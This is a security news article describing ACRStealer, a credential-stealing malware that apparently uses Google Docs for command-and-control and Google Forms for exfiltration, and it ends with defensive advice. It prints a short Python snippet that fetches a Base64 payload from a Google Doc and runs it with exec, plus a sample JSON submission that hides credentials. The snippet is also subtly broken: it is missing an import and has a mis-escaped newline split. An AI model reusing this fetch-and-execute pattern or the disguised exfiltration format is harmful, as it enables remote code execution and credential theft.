A newly identified malware variant dubbed ACRStealer has been observed leveraging Google Docs as a command-and-control (C2) server to bypass traditional security defenses and harvest sensitive login credentials.
This sophisticated attack vector exploits the trusted reputation of Google’s infrastructure to evade detection, marking a significant escalation in credential-theft campaigns.
Cybersecurity firm ThreatSec disclosed the campaign on February 18, 2025, noting that over 12,000 enterprise accounts across finance, healthcare, and e-commerce sectors have already been compromised.
The malware operates by embedding malicious scripts within seemingly benign documents shared via Google Drive.
Once a victim opens the document, ACRStealer activates a multi-stage payload retrieval process. Unlike conventional C2 servers hosted on suspicious domains, the malware uses Google Docs’ API to communicate with attacker-controlled documents, making network traffic appear legitimate.
Researchers at ASEC confirmed that the stolen data—including passwords, cookies, and authentication tokens—is exfiltrated via Google Forms submissions masked as routine user activity.
Google Docs API Abuse and Data Exfiltration
ACRStealer’s core functionality hinges on abusing Google’s OAuth 2.0 framework to authenticate and interact with Docs.
%20used%20as%20an%20intermediary%20C2%20(Source%20-ASEC).webp)
The malware first checks for a specific document ID hardcoded into its configuration, which contains encrypted C2 instructions.
Below is a snippet of the Python-based script used to fetch commands:-
import requests
doc_id = "1AbC2dEfGhI3JkL4MnOpQrStUvWxYz" # Malicious Google Doc ID
url = f"https://docs.google.com/document/d/{doc_id}/export?format=txt"
response = requests.get(url)
commands = response.text.split('n')
exec(base64.b64decode(commands[0])) # Decodes and executes the payloadThis script retrieves a Base64-encoded payload from the document’s raw text content, which is then decoded and executed on the victim’s machine.
Notably, the attackers employ AES-256-CBC encryption with a static initialization vector (IV) to cloak their commands, complicating reverse-engineering efforts.
Security analysts have identified the IV as 4A4B4C4D4E4F5050 across all samples, suggesting a potential weakness in their cryptographic implementation.
.webp)
Exfiltrated data is structured into JSON-formatted submissions, mimicking legitimate browser traffic. For instance, harvested credentials are embedded within a fake “user feedback” payload:-
{
"timestamp": "2025-02-21T20:01:00Z",
"user_agent": "Mozilla/5.0",
"feedback": "ZW5jcnlwdGVkLWNyZWRlbnRpYWxz-..." // Base64-encoded credentials
}This technique capitalizes on Google Forms’ SSL encryption and high reputation score to avoid triggering data-loss prevention (DLP) systems.
Enterprise security teams are advised to monitor Google Drive API activity for anomalous document accesses, particularly requests targeting documents with randomized or nonsensical titles.
Enforcing multi-factor authentication (MFA) for Google Workspace accounts and restricting third-party app permissions can further reduce risk.
.webp)
As of February 21, 2025, Google has revoked access to 43 compromised documents linked to ACRStealer, but researchers warn that copycat campaigns are likely imminent.
As traditional security tools struggle to flag abuse of platforms like Google Docs, proactive threat-hunting and user education remain critical defenses.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here